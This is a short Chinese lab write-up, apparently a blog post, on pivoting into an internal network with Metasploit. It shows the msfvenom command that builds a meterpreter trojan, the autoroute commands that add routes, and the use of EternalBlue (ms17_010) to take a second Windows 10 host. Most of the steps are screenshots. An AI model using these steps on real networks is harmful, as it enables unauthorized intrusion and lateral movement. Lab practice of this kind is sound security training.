MSF路由模块-内网跳跃

实验目的:
1、先获取内网win10主机1的shell
2、meterpreter会话中添加内网路由地址
3、利用永恒之蓝漏洞获取内网win10主机2的shell
跳板实现过程
(1)需要有一个已经获取的meterpreter会话;
(2)获取内网地址网段
(3)在MSF平台上添加去往内网网段的路由

一、网络拓扑

在这里插入图片描述
其中
1:内网win10主机1IP:192.168.26.200
2:外网路由器IP:10.23.40.1(10.23.40.200可访问内网win10主机1)
3:kali攻击机IP:192.168.77.128
4、内网win10主机2IP:10.100.10.100

二、利用3389端口,远程连接内网win10主机1(10.23.40.200)
在这里插入图片描述

三,利用kali生成木马
命令:msfvenom -a x64 -p windows/x64/meterpreter/bind_tcp lport=4444 -f exe -o msf1.exe
在这里插入图片描述

四、设置监听payload在这里插入图片描述

在这里插入图片描述

五、获取内网win10主机1的shell
在这里插入图片描述

六、添加路由
获取目标内网相关信息,命令:run get_local_subnets
配置静态路由,命令:run autoroute -s 10.100.10.100/24
查看路由表,命令:run autoroute -p
在这里插入图片描述

七、添加成功,退出meterpreter会话
在这里插入图片描述

八、利用ms17_010获取内网win10主机2的权限
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

九、成功获取内网win10主机2的shell
在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值